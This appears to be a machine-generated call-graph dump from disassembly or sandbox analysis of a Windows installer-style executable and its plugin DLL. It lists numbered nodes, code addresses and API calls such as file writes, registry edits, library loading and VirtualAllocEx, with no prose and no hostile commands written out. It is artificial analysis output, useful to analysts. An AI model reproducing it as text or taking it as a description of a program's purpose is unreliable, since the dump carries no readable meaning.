3839 403709 lstrlenA 3841 403717 lstrcmpiA 3839->3841 3842 40373d 3839->3842 3840->3829 3840->3839 3845 40564c CharNextA 3840->3845 3841->3842 3846 403727 GetFileAttributesA 3841->3846 3847 405621 3 API calls 3842->3847 3843->3844 3850 4038df 19 API calls 3843->3850 3844->3772 3848 403707 3845->3848 3849 403733 3846->3849 3851 403743 3847->3851 3848->3839 3849->3842 3852 405668 2 API calls 3849->3852 3853 40381d 3850->3853 3989 405b91 lstrcpynA 3851->3989 3852->3842 3855 403829 ShowWindow LoadLibraryA 3853->3855 3856 4038ac 3853->3856 3858 403848 LoadLibraryA 3855->3858 3859 40384f GetClassInfoA 3855->3859 3990 404f4e OleInitialize 3856->3990 3858->3859 3861 403863 GetClassInfoA RegisterClassA 3859->3861 3862 403879 DialogBoxParamA 3859->3862 3860 4038b2 3863 4038b6 3860->3863 3864 4038ce 3860->3864 3861->3862 3865 40140b 2 API calls 3862->3865 3863->3844 3868 40140b 2 API calls 3863->3868 3866 40140b 2 API calls 3864->3866 3867 4038a1 3865->3867 3866->3844 3867->3844 3868->3844 3869->3714 4005 405b91 lstrcpynA 3870->4005 3872 405720 4006 4056ba CharNextA CharNextA 3872->4006 3875 40336e 3875->3772 3884 405b91 lstrcpynA 3875->3884 3876 405dfc 5 API calls 3882 405736 3876->3882 3877 405761 lstrlenA 3878 40576c 3877->3878 3877->3882 3879 405621 3 API calls 3878->3879 3881 405771 GetFileAttributesA 3879->3881 3881->3875 3882->3875 3882->3877 3883 405668 2 API calls 3882->3883 4012 405e95 FindFirstFileA 3882->4012 3883->3877 3884->3759 3885->3728 3887 403558 3886->3887 3888 40354a CloseHandle 3886->3888 4015 403585 3887->4015 3888->3887 3894 4053ba 3893->3894 3895 4033bf ExitProcess 3894->3895 3896 4053ce MessageBoxIndirectA 3894->3896 3896->3895 3897->3750 3898->3757 3900 405ebc 3 API calls 3899->3900 3901 405a4c 3900->3901 3903 405a6d 3901->3903 4072 4058c9 lstrcpyA 3901->4072 3903->3757 3905 405373 CloseHandle 3904->3905 3906 40537f 3904->3906 3905->3906 3906->3757 3908 401389 2 API calls 3907->3908 3909 401420 3908->3909 3909->3738 3911 4030cc CreateDirectoryA 3910->3911 3912 40563b lstrcatA 3910->3912 3913 405851 3911->3913 3912->3911 3914 40585c GetTickCount GetTempFileNameA 3913->3914 3915 405889 3914->3915 3916 4030e0 3914->3916 3915->3914 3915->3916 3916->3716 3917->3788 3918->3790 3920 405675 3919->3920 3921 402c95 3920->3921 3922 40567a CharPrevA 3920->3922 3923 405b91 lstrcpynA 3921->3923 3922->3920 3922->3921 3923->3794 3925 402be6 3924->3925 3926 402bce 3924->3926 3929 402bf6 GetTickCount 3925->3929 3930 402bee 3925->3930 3927 402bd7 DestroyWindow 3926->3927 3928 402bde 3926->3928 3927->3928 3928->3797 3931 402c04 CreateDialogParamA ShowWindow 3929->3931 3932 402c27 3929->3932 3961 405ef5 3930->3961 3931->3932 3932->3797 3935->3805 3937 402e7a 3936->3937 3938 402ea7 3937->3938 3965 403097 SetFilePointer 3937->3965 3939 403081 ReadFile 3938->3939 3941 402eb2 3939->3941 3942 402ec4 GetTickCount 3941->3942 3943 403017 3941->3943 3945 403002 3941->3945 3942->3945 3953 402f11 3942->3953 3944 40301b 3943->3944 3949 403033 3943->3949 3946 403081 ReadFile 3944->3946 3945->3811 3946->3945 3947 403081 ReadFile 3947->3953 3948 403081 ReadFile 3948->3949 3949->3945 3949->3948 3950 40304e WriteFile 3949->3950 3950->3945 3951 403062 3950->3951 3951->3945 3951->3949 3952 402f67 GetTickCount 3952->3953 3953->3945 3953->3947 3953->3952 3954 402f8c MulDiv wsprintfA 3953->3954 3956 402fca WriteFile 3953->3956 3966 404e7c 3954->3966 3956->3945 3956->3953 3977 40589a ReadFile 3957->3977 3960->3804 3962 405f12 PeekMessageA 3961->3962 3963 402bf4 3962->3963 3964 405f08 DispatchMessageA 3962->3964 3963->3797 3964->3962 3965->3938 3967 404f3a 3966->3967 3968 404e97 3966->3968 3967->3953 3969 404eb4 lstrlenA 3968->3969 3970 405bb3 18 API calls 3968->3970 3971 404ec2 lstrlenA 3969->3971 3972 404edd 3969->3972 3970->3969 3971->3967 3973 404ed4 lstrcatA 3971->3973 3974 404ef0 3972->3974 3975 404ee3 SetWindowTextA 3972->3975 3973->3972 3974->3967 3976 404ef6 SendMessageA SendMessageA SendMessageA 3974->3976 3975->3974 3976->3967 3978 403094 3977->3978 3978->3807 3980 4038f3 3979->3980 3997 405aef wsprintfA 3980->3997 3982 403964 3983 405bb3 18 API calls 3982->3983 3984 403970 SetWindowTextA 3983->3984 3985 40369f 3984->3985 3986 40398c 3984->3986 3985->3827 3986->3985 3987 405bb3 18 API calls 3986->3987 3987->3986 3988->3824 3989->3829 3998 403ecb 3990->3998 3992 404f98 3993 403ecb SendMessageA 3992->3993 3994 404faa OleUninitialize 3993->3994 3994->3860 3995 404f71 3995->3992 4001 401389 3995->4001 3997->3982 3999 403ee3 3998->3999 4000 403ed4 SendMessageA 3998->4000 3999->3995 4000->3999 4003 401390 4001->4003 4002 4013fe 4002->3995 4003->4002 4004 4013cb MulDiv SendMessageA 4003->4004 4004->4003 4005->3872 4007 4056e5 4006->4007 4008 4056d5 4006->4008 4009 405705 4007->4009 4011 40564c CharNextA 4007->4011 4008->4007 4010 4056e0 CharNextA 4008->4010 4009->3875 4009->3876 4010->4009 4011->4007 4013 405eb6 4012->4013 4014 405eab FindClose 4012->4014 4013->3882 4014->4013 4016 403593 4015->4016 4017 403598 FreeLibrary GlobalFree 4016->4017 4018 40355d 4016->4018 4017->4017 4017->4018 4019 405451 4018->4019 4020 40570f 18 API calls 4019->4020 4021 405471 4020->4021 4022 405490 4021->4022 4023 405479 DeleteFileA 4021->4023 4025 4055c8 4022->4025 4059 405b91 lstrcpynA 4022->4059 4024 4033a1 OleUninitialize 4023->4024 4024->3736 4024->3737 4025->4024 4030 405e95 2 API calls 4025->4030 4027 4054b6 4028 4054c9 4027->4028 4029 4054bc lstrcatA 4027->4029 4032 405668 2 API calls 4028->4032 4031 4054cf 4029->4031 4033 4055e2 4030->4033 4034 4054dd lstrcatA 4031->4034 4035 4054e8 lstrlenA FindFirstFileA 4031->4035 4032->4031 4033->4024 4036 4055e6 4033->4036 4034->4035 4037 4055be 4035->4037 4057 40550c 4035->4057 4038 405621 3 API calls 4036->4038 4037->4025 4040 4055ec 4038->4040 4039 40564c CharNextA 4039->4057 4041 405409 5 API calls 4040->4041 4042 4055f8 4041->4042 4043 405612 4042->4043 4044 4055fc 4042->4044 4045 404e7c 25 API calls 4043->4045 4044->4024 4049 404e7c 25 API calls 4044->4049 4045->4024 4046 40559d FindNextFileA 4048 4055b5 FindClose 4046->4048 4046->4057 4048->4037 4050 405609 4049->4050 4051 405a45 40 API calls 4050->4051 4054 405610 4051->4054 4053 405451 64 API calls 4053->4057 4054->4024 4055 404e7c 25 API calls 4055->4046 4056 404e7c 25 API calls 4056->4057 4057->4039 4057->4046 4057->4053 4057->4055 4057->4056 4058 405a45 40 API calls 4057->4058 4060 405b91 lstrcpynA 4057->4060 4061 405409 4057->4061 4058->4057 4059->4027 4060->4057 4069 4057fd GetFileAttributesA 4061->4069 4064 405436 4064->4057 4065 405424 RemoveDirectoryA 4067 405432 4065->4067 4066 40542c DeleteFileA 4066->4067 4067->4064 4068 405442 SetFileAttributesA 4067->4068 4068->4064 4070 405415 4069->4070 4071 40580f SetFileAttributesA 4069->4071 4070->4064 4070->4065 4070->4066 4071->4070 4073 4058f2 4072->4073 4074 405918 GetShortPathNameA 4072->4074 4097 405822 GetFileAttributesA CreateFileA 4073->4097 4076 40592d 4074->4076 4077 405a3f 4074->4077 4076->4077 4079 405935 wsprintfA 4076->4079 4077->3903 4078 4058fc CloseHandle GetShortPathNameA 4078->4077 4080 405910 4078->4080 4081 405bb3 18 API calls 4079->4081 4080->4074 4080->4077 4082 40595d 4081->4082 4098 405822 GetFileAttributesA CreateFileA 4082->4098 4084 40596a 4084->4077 4085 405979 GetFileSize GlobalAlloc 4084->4085 4086 405a38 CloseHandle 4085->4086 4087 40599b 4085->4087 4086->4077 4088 40589a ReadFile 4087->4088 4089 4059a3 4088->4089 4089->4086 4099 405787 lstrlenA 4089->4099 4092 4059ba lstrcpyA 4095 4059dc 4092->4095 4093 4059ce 4094 405787 4 API calls 4093->4094 4094->4095 4096 405a13 SetFilePointer WriteFile GlobalFree 4095->4096 4096->4086 4097->4078 4098->4084 4100 4057c8 lstrlenA 4099->4100 4101 4057d0 4100->4101 4102 4057a1 lstrcmpiA 4100->4102 4101->4092 4101->4093 4102->4101 4103 4057bf CharNextA 4102->4103 4103->4100 4679 4018e3 4680 40191a 4679->4680 4681 4029fd 18 API calls 4680->4681 4682 40191f 4681->4682 4683 405451 71 API calls 4682->4683 4684 401928 4683->4684 4104 10002724 4105 10002774 4104->4105 4106 10002734 VirtualProtect 4104->4106 4106->4105 4685 4018e6 4686 4029fd 18 API calls 4685->4686 4687 4018ed 4686->4687 4688 4053a5 MessageBoxIndirectA 4687->4688 4689 4018f6 4688->4689 4147 401f68 4148 401f7a 4147->4148 4149 402028 4147->4149 4150 4029fd 18 API calls 4148->4150 4151 401423 25 API calls 4149->4151 4152 401f81 4150->4152 4158 402181 4151->4158 4153 4029fd 18 API calls 4152->4153 4154 401f8a 4153->4154 4155 401f92 GetModuleHandleA 4154->4155 4156 401f9f LoadLibraryExA 4154->4156 4155->4156 4157 401faf GetProcAddress 4155->4157 4156->4149 4156->4157 4159 401ffb 4157->4159 4160 401fbe 4157->4160 4161 404e7c 25 API calls 4159->4161 4162 401fc6 4160->4162 4163 401fdd 4160->4163 4165 401fce 4161->4165 4211 401423 4162->4211 4168 100016da 4163->4168 4165->4158 4166 40201c FreeLibrary 4165->4166 4166->4158 4169 1000170a 4168->4169 4214 10001a86 4169->4214 4171 10001711 4172 10001827 4171->4172 4173 10001722 4171->4173 4174 10001729 4171->4174 4172->4165 4266 100021ce 4173->4266 4248 10002218 4174->4248 4179 1000178d 4183 10001793 4179->4183 4184 100017cf 4179->4184 4180 1000176f 4279 100023d6 4180->4279 4181 10001758 4185 1000175d 4181->4185 4194 1000174e 4181->4194 4182 1000173f 4187 10001745 4182->4187 4193 10001750 4182->4193 4189 10001576 3 API calls 4183->4189 4191 100023d6 13 API calls 4184->4191 4276 10002abb 4185->4276 4187->4194 4260 10002800 4187->4260 4196 100017a9 4189->4196 4197 100017c1 4191->4197 4270 100025a2 4193->4270 4194->4179 4194->4180 4199 100023d6 13 API calls 4196->4199 4200 100017d6 4197->4200 4199->4197 4203 10001816 4200->4203 4302 1000239c 4200->4302 4203->4172 4205 10001820 GlobalFree 4203->4205 4205->4172 4208 10001802 4208->4203 4306 100014ff wsprintfA 4208->4306 4209 100017fb FreeLibrary 4209->4208 4212 404e7c 25 API calls 4211->4212 4213 401431 4212->4213 4213->4165 4309 10001215 GlobalAlloc 4214->4309 4216 10001aaa 4310 10001215 GlobalAlloc 4216->4310 4218 10001ab5 4311 1000123b 4218->4311 4220 10001ce4 GlobalFree GlobalFree GlobalFree 4221 10001d01 4220->4221 4236 10001d4b 4220->4236 4222 1000203c 4221->4222 4230 10001d16 4221->4230 4221->4236 4224 1000205e GetModuleHandleA 4222->4224 4222->4236 4223 10001b89 GlobalAlloc 4243 10001abd 4223->4243 4227 10002084 4224->4227 4228 1000206f LoadLibraryA 4224->4228 4225 10001bd4 lstrcpyA 4231 10001bde lstrcpyA 4225->4231 4226 10001bf2 GlobalFree 4226->4243 4322 100015c1 GetProcAddress 4227->4322 4228->4227 4228->4236 4230->4236 4318 10001224 4230->4318 4231->4243 4232 100020d5 4233 100020e2 lstrlenA 4232->4233 4232->4236 4323 100015c1 GetProcAddress 4233->4323 4235 10001f9c 4235->4236 4240 10001fe0 lstrcpyA 4235->4240 4236->4171 4237 10002096 4237->4232 4247 100020bf GetProcAddress 4237->4247 4240->4236 4241 10001c30 4241->4243 4316 10001551 GlobalSize GlobalAlloc 4241->4316 4242 10001e97 GlobalFree 4242->4243 4243->4220 4243->4223 4243->4225 4243->4226 4243->4231 4243->4235 4243->4236 4243->4241 4243->4242 4246 10001224 2 API calls 4243->4246 4321 10001215 GlobalAlloc 4243->4321 4244 100020fb 4244->4236 4246->4243 4247->4232 4252 10002230 4248->4252 4249 1000123b 3 API calls 4249->4252 4251 10002365 GlobalFree 4251->4252 4253 1000172f 4251->4253 4252->4249 4252->4251 4254 10001224 GlobalAlloc lstrcpynA 4252->4254 4255 100022ed GlobalAlloc MultiByteToWideChar 4252->4255 4256 100022cc lstrlenA 4252->4256 4326 100012bf 4252->4326 4253->4181 4253->4182 4253->4194 4254->4252 4257 100022db 4255->4257 4258 10002317 GlobalAlloc CLSIDFromString GlobalFree 4255->4258 4256->4251 4256->4257 4257->4251 4331 10002536 4257->4331 4258->4251 4262 10002812 4260->4262 4261 100028b7 VirtualAllocEx 4263 100028d5 4261->4263 4262->4261 4264 100029d1 4263->4264 4265 100029c6 GetLastError 4263->4265 4264->4194 4265->4264 4267 10001728 4266->4267 4268 100021de 4266->4268 4267->4174 4268->4267 4269 100021f0 GlobalAlloc 4268->4269 4269->4268 4273 100025be 4270->4273 4271 10002622 4274 10002627 GlobalSize 4271->4274 4275 10002631 4271->4275 4272 1000260f GlobalAlloc 4272->4275 4273->4271 4273->4272 4274->4275 4275->4194 4277 10002ac6 4276->4277 4278 10002b06 GlobalFree 4277->4278 4280 100023f1 4279->4280 4282 10002437 wsprintfA 4280->4282 4283 100024af lstrcpynA 4280->4283 4284 100024ef GlobalFree 4280->4284 4285 10002518 GlobalFree 4280->4285 4287 1000248c WideCharToMultiByte 4280->4287 4288 1000244b GlobalAlloc StringFromGUID2 WideCharToMultiByte GlobalFree 4280->4288 4289 10001278 2 API calls 4280->4289 4334 10001215 GlobalAlloc 4280->4334 4335 100012e8 4280->4335 4282->4280 4283->4280 4284->4280 4285->4280 4286 10001775 4285->4286 4291 10001576 4286->4291 4287->4280 4288->4280 4289->4280 4339 10001215 GlobalAlloc 4291->4339 4293 1000157c 4294 10001589 lstrcpyA 4293->4294 4296 100015a3 4293->4296 4298 100015bd 4294->4298 4297 100015a8 wsprintfA 4296->4297 4296->4298 4297->4298 4299 10001278 4298->4299 4300 10001281 GlobalAlloc lstrcpynA 4299->4300 4301 100012ba GlobalFree 4299->4301 4300->4301 4301->4200 4303 100017e2 4302->4303 4304 100023aa 4302->4304 4303->4208 4303->4209 4304->4303 4305 100023c3 GlobalFree 4304->4305 4305->4304 4307 10001278 2 API calls 4306->4307 4308 10001520 4307->4308 4308->4203 4309->4216 4310->4218 4312 10001274 4311->4312 4313 10001245 4311->4313 4312->4243 4313->4312 4324 10001215 GlobalAlloc 4313->4324 4315 10001251 lstrcpyA GlobalFree 4315->4243 4317 1000156f 4316->4317 4317->4241 4325 10001215 GlobalAlloc 4318->4325 4320 10001233 lstrcpynA 4320->4236 4321->4243 4322->4237 4323->4244 4324->4315 4325->4320 4327 100012e3 4326->4327 4328 100012c7 4326->4328 4327->4327 4328->4327 4329 10001224 2 API calls 4328->4329 4330 100012e1 4329->4330 4330->4252 4332 10002544 VirtualAlloc 4331->4332 4333 1000259a 4331->4333 4332->4333 4333->4257 4334->4280 4336 100012f1 4335->4336 4337 10001316 4335->4337 4336->4337 4338 100012fd lstrcpyA 4336->4338 4337->4280 4338->4337 4339->4293 4690 1000182a 4691 1000123b 3 API calls 4690->4691 4692 10001850 4691->4692 4693 1000123b 3 API calls 4692->4693 4694 10001858 4693->4694 4695 1000123b 3 API calls 4694->4695 4698 10001895 4694->4698 4696 1000187a 4695->4696 4697 10001883 GlobalFree 4696->4697 4697->4698 4699 10001278 2 API calls 4698->4699 4700 10001a0c GlobalFree GlobalFree 4699->4700 4701 40286d SendMessageA 4702 402892 4701->4702 4703 402887 InvalidateRect 4701->4703 4703->4702 4704 4014f0 SetForegroundWindow 4705 402892 4704->4705 4706 401af0 4707 4029fd 18 API calls 4706->4707 4708 401af7 4707->4708 4709 4029e0 18 API calls 4708->4709 4710 401b00 wsprintfA 4709->4710 4711 402892 4710->4711 4712 404df0 4713 404e00 4712->4713 4714 404e14 4712->4714 4715 404e06 4713->4715 4724 404e5d 4713->4724 4716 404e1c IsWindowVisible 4714->4716 4721 404e33 4714->4721 4719 403ecb SendMessageA 4715->4719 4717 404e29 4716->4717 4716->4724 4725 404747 SendMessageA 4717->4725 4718 404e62 CallWindowProcA 4722 404e10 4718->4722 4719->4722 4721->4718 4730 4047c7 4721->4730 4724->4718 4726 4047a6 SendMessageA 4725->4726 4727 40476a GetMessagePos ScreenToClient SendMessageA 4725->4727 4729 40479e 4726->4729 4728 4047a3 4727->4728 4727->4729 4728->4726 4729->4721 4739 405b91 lstrcpynA 4730->4739 4732 4047da 4740 405aef wsprintfA 4732->4740 4734 4047e4 4735 40140b 2 API calls 4734->4735 4736 4047ed 4735->4736 4741 405b91 lstrcpynA 4736->4741 4738 4047f4 4738->4724 4739->4732 4740->4734 4741->4738 4742 4019f1 4743 4029fd 18 API calls 4742->4743 4744 4019fa ExpandEnvironmentStringsA 4743->4744 4745 401a0e 4744->4745 4747 401a21 4744->4747 4746 401a13 lstrcmpA 4745->4746 4745->4747 4746->4747 4748 404276 4749 404286 4748->4749 4750 4042ac 4748->4750 4752 403e7f 19 API calls 4749->4752 4751 403ee6 8 API calls 4750->4751 4753 4042b8 4751->4753 4754 404293 SetDlgItemTextA 4752->4754 4754->4750 4755 10001637 4756 10001666 4755->4756 4757 10001a86 20 API calls 4756->4757 4758 1000166d 4757->4758 4759 10001680 4758->4759 4760 10001674 4758->4760 4762 100016a7 4759->4762 4763 1000168a 4759->4763 4761 10001278 2 API calls 4760->4761 4766 1000167e 4761->4766 4764 100016d1 4762->4764 4765 100016ad 4762->4765 4767 100014ff 3 API calls 4763->4767 4769 100014ff 3 API calls 4764->4769 4768 10001576 3 API calls 4765->4768 4770 1000168f 4767->4770 4771 100016b2 4768->4771 4769->4766 4772 10001576 3 API calls 4770->4772 4773 10001278 2 API calls 4771->4773 4774 10001695 4772->4774 4776 100016b8 GlobalFree 4773->4776 4775 10001278 2 API calls 4774->4775 4777 1000169b GlobalFree 4775->4777 4776->4766 4778 100016cc GlobalFree 4776->4778 4777->4766 4778->4766 4779 401c78 4780 4029e0 18 API calls 4779->4780 4781 401c7e IsWindow 4780->4781 4782 4019e1 4781->4782 4783 4047f9 GetDlgItem GetDlgItem 4784 40484b 7 API calls 4783->4784 4796 404a63 4783->4796 4785 4048e1 SendMessageA 4784->4785 4786 4048ee DeleteObject 4784->4786 4785->4786 4787 4048f7 4786->4787 4789 40492e 4787->4789 4790 405bb3 18 API calls 4787->4790 4788 404b47 4792 404bf3 4788->4792 4798 404a56 4788->4798 4803 404ba0 SendMessageA 4788->4803 4791 403e7f 19 API calls 4789->4791 4793 404910 SendMessageA SendMessageA 4790->4793 4797 404942 4791->4797 4794 404c05 4792->4794 4795 404bfd SendMessageA 4792->4795 4793->4787 4805 404c17 ImageList_Destroy 4794->4805 4806 404c1e 4794->4806 4812 404c2e 4794->4812 4795->4794 4796->4788 4801 404747 5 API calls 4796->4801 4817 404ad4 4796->4817 4802 403e7f 19 API calls 4797->4802 4799 403ee6 8 API calls 4798->4799 4804 404de9 4799->4804 4800 404b39 SendMessageA 4800->4788 4801->4817 4818 404950 4802->4818 4803->4798 4808 404bb5 SendMessageA 4803->4808 4805->4806 4810 404c27 GlobalFree 4806->4810 4806->4812 4807 404d9d 4807->4798 4813 404daf ShowWindow GetDlgItem ShowWindow 4807->4813 4809 404bc8 4808->4809 4820 404bd9 SendMessageA 4809->4820 4810->4812 4811 404a24 GetWindowLongA SetWindowLongA 4814 404a3d 4811->4814 4812->4807 4827 4047c7 4 API calls 4812->4827 4828 404c69 4812->4828 4813->4798 4815 404a43 ShowWindow 4814->4815 4816 404a5b 4814->4816 4834 403eb4 SendMessageA 4815->4834 4835 403eb4 SendMessageA 4816->4835 4817->4788 4817->4800 4818->4811 4819 40499f SendMessageA 4818->4819 4821 404a1e 4818->4821 4825 4049db SendMessageA 4818->4825 4826 4049ec SendMessageA 4818->4826 4819->4818 4820->4792 4821->4811 4821->4814 4822 404cad 4829 404d73 InvalidateRect 4822->4829 4833 404d21 SendMessageA SendMessageA 4822->4833 4825->4818 4826->4818 4827->4828 4828->4822 4830 404c97 SendMessageA 4828->4830 4829->4807 4831 404d89 4829->4831 4830->4822 4836 404665 4831->4836 4833->4822 4834->4798 4835->4796 4837 40467f 4836->4837 4838 405bb3 18 API calls 4837->4838 4839 4046b4 4838->4839 4840 405bb3 18 API calls 4839->4840 4841 4046bf 4840->4841 4842 405bb3 18 API calls 4841->4842 4843 4046f0 lstrlenA wsprintfA SetDlgItemTextA 4842->4843 4843->4807 4844 1000103d 4845 1000101b 8 API calls 4844->4845 4846 10001056 4845->4846 4847 4014fe 4848 401506 4847->4848 4850 401519 4847->4850 4849 4029e0 18 API calls 4848->4849 4849->4850 4851 40227f 4852 4029fd 18 API calls 4851->4852 4853 402290 4852->4853 4854 4029fd 18 API calls 4853->4854 4855 402299 4854->4855 4856 4029fd 18 API calls 4855->4856 4857 4022a3 GetPrivateProfileStringA 4856->4857 4858 4045ff 4859 40462b 4858->4859 4860 40460f 4858->4860 4861 404631 SHGetPathFromIDListA 4859->4861 4862 40465e 4859->4862 4869 405389 GetDlgItemTextA 4860->4869 4865 404641 4861->4865 4866 404648 SendMessageA 4861->4866 4864 40461c SendMessageA 4864->4859 4867 40140b 2 API calls 4865->4867 4866->4862 4867->4866 4869->4864 4870 401000 4871 401037 BeginPaint GetClientRect 4870->4871 4874 40100c DefWindowProcA 4870->4874 4872 4010f3 4871->4872 4875 401073 CreateBrushIndirect FillRect DeleteObject 4872->4875 4876 4010fc 4872->4876 4877 401179 4874->4877 4875->4872 4878 401102 CreateFontIndirectA 4876->4878 4879 401167 EndPaint 4876->4879 4878->4879 4880 401112 6 API calls 4878->4880 4879->4877 4880->4879 4881 402602 4882 402892 4881->4882 4883 402609 4881->4883 4884 40260f FindClose 4883->4884 4884->4882 4885 402683 4886 4029fd 18 API calls 4885->4886 4887 402691 4886->4887 4888 4026a7 4887->4888 4889 4029fd 18 API calls 4887->4889 4890 4057fd 2 API calls 4888->4890 4889->4888 4891 4026ad 4890->4891 4911 405822 GetFileAttributesA CreateFileA 4891->4911 4893 4026ba 4894 402763 4893->4894 4895 4026c6 GlobalAlloc 4893->4895 4898 40276b DeleteFileA 4894->4898 4899 40277e 4894->4899 4896 40275a CloseHandle 4895->4896 4897 4026df 4895->4897 4896->4894 4912 403097 SetFilePointer 4897->4912 4898->4899 4901 4026e5 4902 403081 ReadFile 4901->4902 4903 4026ee GlobalAlloc 4902->4903 4904 402732 WriteFile GlobalFree 4903->4904 4905 4026fe 4903->4905 4907 402e62 33 API calls 4904->4907 4906 402e62 33 API calls 4905->4906 4910 40270b 4906->4910 4908 402757 4907->4908 4908->4896 4909 402729 GlobalFree 4909->4904 4910->4909 4911->4893 4912->4901 4913 402784 4914 4029e0 18 API calls 4913->4914 4915 40278a 4914->4915 4916 4027c5 4915->4916 4917 4027ae 4915->4917 4922 402663 4915->4922 4919 4027db 4916->4919 4920 4027cf 4916->4920 4918 4027b3 4917->4918 4926 4027c2 4917->4926 4927 405b91 lstrcpynA 4918->4927 4923 405bb3 18 API calls 4919->4923 4921 4029e0 18 API calls 4920->4921 4921->4926 4923->4926 4926->4922 4928 405aef wsprintfA 4926->4928 4927->4922 4928->4922 4117 401705 4118 4029fd 18 API calls 4117->4118 4119 40170c SearchPathA 4118->4119 4120 4027bd 4119->4120 4121 401727 4119->4121 4121->4120 4123 405b91 lstrcpynA 4121->4123 4123->4120 4340 401389 4342 401390 4340->4342 4341 4013fe 4342->4341 4343 4013cb MulDiv SendMessageA 4342->4343 4343->4342 4929 40280a 4930 4029e0 18 API calls 4929->4930 4931 402810 4930->4931 4932 402841 4931->4932 4933 402663 4931->4933 4935 40281e 4931->4935 4932->4933 4934 405bb3 18 API calls 4932->4934 4934->4933 4935->4933 4937 405aef wsprintfA 4935->4937 4937->4933 4938 40218a 4939 4029fd 18 API calls 4938->4939 4940 402190 4939->4940 4941 4029fd 18 API calls 4940->4941 4942 402199 4941->4942 4943 4029fd 18 API calls 4942->4943 4944 4021a2 4943->4944 4945 405e95 2 API calls 4944->4945 4946 4021ab 4945->4946 4947 4021bc lstrlenA lstrlenA 4946->4947 4948 4021af 4946->4948 4950 404e7c 25 API calls 4947->4950 4949 404e7c 25 API calls 4948->4949 4952 4021b7 4948->4952 4949->4952 4951 4021f8 SHFileOperationA 4950->4951 4951->4948 4951->4952 4953 40220c 4954 402226 4953->4954 4955 402213 4953->4955 4956 405bb3 18 API calls 4955->4956 4957 402220 4956->4957 4958 4053a5 MessageBoxIndirectA 4957->4958 4958->4954 4959 401490 4960 404e7c 25 API calls 4959->4960 4961 401497 4960->4961 4962 100015d0 4963 100014d8 4 API calls 4962->4963 4966 100015e8 4963->4966 4964 1000162e GlobalFree 4965 10001603 4965->4964 4966->4964 4966->4965 4967 1000161a VirtualFree 4966->4967 4967->4964 4358 401b11 4359 401b62 4358->4359 4360 401b1e 4358->4360 4361 401b66 4359->4361 4362 401b8b GlobalAlloc 4359->4362 4363 401ba6 4360->4363 4366 401b35 4360->4366 4372 402226 4361->4372 4379 405b91 lstrcpynA 4361->4379 4365 405bb3 18 API calls 4362->4365 4364 405bb3 18 API calls 4363->4364 4363->4372 4367 402220 4364->4367 4365->4363 4377 405b91 lstrcpynA 4366->4377 4373 4053a5 MessageBoxIndirectA 4367->4373 4370 401b78 GlobalFree 4370->4372 4371 401b44 4378 405b91 lstrcpynA 4371->4378 4373->4372 4375 401b53 4380 405b91 lstrcpynA 4375->4380 4377->4371 4378->4375 4379->4370 4380->4372 4968 403f93 lstrcpynA lstrlenA 4409 401595 4410 4029fd 18 API calls 4409->4410 4411 40159c SetFileAttributesA 4410->4411 4412 4015ae 4411->4412 4969 401c95 4970 4029e0 18 API calls 4969->4970 4971 401c9c 4970->4971 4972 4029e0 18 API calls 4971->4972 4973 401ca4 GetDlgItem 4972->4973 4974 4024cb 4973->4974 4975 10001058 4976 1000123b 3 API calls 4975->4976 4978 10001074 4976->4978 4977 100010dc 4978->4977 4979 100014d8 4 API calls 4978->4979 4980 10001091 4978->4980 4979->4980 4981 100014d8 4 API calls 4980->4981 4982 100010a1 4981->4982 4983 100010b1 4982->4983 4984 100010a8 GlobalSize 4982->4984 4985 100010b5 GlobalAlloc 4983->4985 4986 100010c6 4983->4986 4984->4983 4987 100014ff 3 API calls 4985->4987 4988 100010d1 GlobalFree 4986->4988 4987->4986 4988->4977 4464 402519 4465 4029e0 18 API calls 4464->4465 4466 402523 4465->4466 4467 40589a ReadFile 4466->4467 4468 40258f 4466->4468 4471 40259f 4466->4471 4472 40258d 4466->4472 4467->4466 4473 405aef wsprintfA 4468->4473 4470 4025b5 SetFilePointer 4470->4472 4471->4470 4471->4472 4473->4472 4989 100029db 4990 100029f3 4989->4990 4991 10001551 2 API calls 4990->4991 4992 10002a0e 4991->4992 4484 40231c 4485 402322 4484->4485 4486 4029fd 18 API calls 4485->4486 4487 402334 4486->4487 4488 4029fd 18 API calls 4487->4488 4489 40233e RegCreateKeyExA 4488->4489 4490 402368 4489->4490 4493 402663 4489->4493 4491 402380 4490->4491 4492 4029fd 18 API calls 4490->4492 4495 4029e0 18 API calls 4491->4495 4497 40238c 4491->4497 4494 402379 lstrlenA 4492->4494 4494->4491 4495->4497 4496 4023a7 RegSetValueExA 4499 4023bd RegCloseKey 4496->4499 4497->4496 4498 402e62 33 API calls 4497->4498 4498->4496 4499->4493 4993 40261c 4994 402637 4993->4994 4995 40261f 4993->4995 4996 4027bd 4994->4996 4999 405b91 lstrcpynA 4994->4999 4997 40262c FindNextFileA 4995->4997 4997->4994 4999->4996 5000 100010e0 5001 1000110e 5000->5001 5002 1000123b 3 API calls 5001->5002 5006 1000111e 5002->5006 5003 100011c4 GlobalFree 5004 100012bf 2 API calls 5004->5006 5005 1000123b 3 API calls 5005->5006 5006->5003 5006->5004 5006->5005 5007 100011c3 5006->5007 5008 100011ea GlobalFree 5006->5008 5009 10001278 2 API calls 5006->5009 5010 10001155 GlobalAlloc 5006->5010 5011 100012e8 lstrcpyA 5006->5011 5012 100011b1 GlobalFree 5006->5012 5007->5003 5008->5006 5009->5012 5010->5006 5011->5006 5012->5006 5013 4016a1 5014 4029fd 18 API calls 5013->5014 5015 4016a7 GetFullPathNameA 5014->5015 5017 4016be 5015->5017 5022 4016df 5015->5022 5016 4016f3 GetShortPathNameA 5018 402892 5016->5018 5019 405e95 2 API calls 5017->5019 5017->5022 5020 4016cf 5019->5020 5020->5022 5023 405b91 lstrcpynA 5020->5023 5022->5016 5022->5018 5023->5022 4124 401d26 GetDC GetDeviceCaps 4132 4029e0 4124->4132 4126 401d44 MulDiv ReleaseDC 4127 4029e0 18 API calls 4126->4127 4128 401d63 4127->4128 4129 405bb3 18 API calls 4128->4129 4130 401d9c CreateFontIndirectA 4129->4130 4131 4024cb 4130->4131 4133 405bb3 18 API calls 4132->4133 4134 4029f4 4133->4134 4134->4126 4344 40172c 4345 4029fd 18 API calls 4344->4345 4346 401733 4345->4346 4347 405851 2 API calls 4346->4347 4348 40173a 4347->4348 4349 405851 2 API calls 4348->4349 4349->4348 4350 401dac 4351 4029e0 18 API calls 4350->4351 4352 401db2 4351->4352 4353 4029e0 18 API calls 4352->4353 4354 401dbb 4353->4354 4355 401dc2 ShowWindow 4354->4355 4356 401dcd EnableWindow 4354->4356 4357 402892 4355->4357 4356->4357 5024 401eac 5025 4029fd 18 API calls 